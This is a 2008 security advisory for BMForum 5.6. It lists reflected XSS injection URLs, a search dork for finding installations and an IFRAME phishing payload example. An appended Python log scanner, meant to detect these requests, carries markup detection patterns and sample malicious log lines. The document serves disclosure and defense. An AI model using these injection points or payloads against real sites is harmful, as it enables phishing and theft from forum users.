Computer Security
[EN] securityvulns.ru

From:tan_prathan_(at)_hotmail.com <tan_prathan_(at)_hotmail.com>
Date:22.05.2008
Subject:BMForum Remote 5.6 Multiple XSS Vulnerability

==========================================================
     BMForum Remote 5.6 Multiple XSS Vulnerability
==========================================================


AUTHOR : CWH Underground
DATE   : 22 May 2008
SITE   : www.citec.us


#####################################################
APPLICATION : BMForum
VERSION     : 5.6 (Latest Version)
VENDOR      : http://downloads.sourceforge.net/bmforum
#####################################################

DORK: "powered by BMForum"

---Exploit---

[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS>

--- Note ---
Very dangerous when the 'IFRAME' tag is used for phishing techniques

Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME src=http://phisherpage.com width="900" height="600">

##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #
##################################################################
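
--- Added example (not part of the original advisory) ---
A log check a forum operator can run to find requests that put markup into the parameters listed above. The script paths and parameter names are taken from the advisory; the log format (combined access log), the sample lines and the function names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path suffix -> parameters the advisory lists as reflecting input.
WATCHED = {
    "/index.php": {"outpused"},
    "/newtem/footer/bsd01footer.php": {"footer_copyright", "verandproname"},
    "/newtem/header/bsd01header.php": {"topads", "myplugin"},
}
# Markup indicators: a tag opener, an event-handler attribute, a javascript: URI.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript\s*:", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SAMPLE = [  # constructed access-log lines, not real traffic
    '203.0.113.5 - - [22/May/2008:10:00:00 +0000] "GET /forum/index.php?outpused=%3CIFRAME%20src=http://example.invalid%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [22/May/2008:10:00:01 +0000] "GET /forum/newtem/header/bsd01header.php?topads=%253Cb%253Ehi HTTP/1.1" 200 90',
    '198.51.100.7 - - [22/May/2008:10:00:02 +0000] "GET /forum/index.php?outpused=1 HTTP/1.1" 200 512',
]


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return [(path, param, decoded_value)] for watched params carrying markup."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    hits = []
    for suffix, params in WATCHED.items():
        if not url.path.lower().endswith(suffix):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)
            if name.lower() in params and MARKUP.search(value):
                hits.append((url.path, name, value))
    return hits


if __name__ == "__main__":
    for line in SAMPLE:
        print(suspicious_params(line))
```

A hit means markup was sent to one of the listed parameters, not that the page reflected it; confirm against the response or the installed BMForum version.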
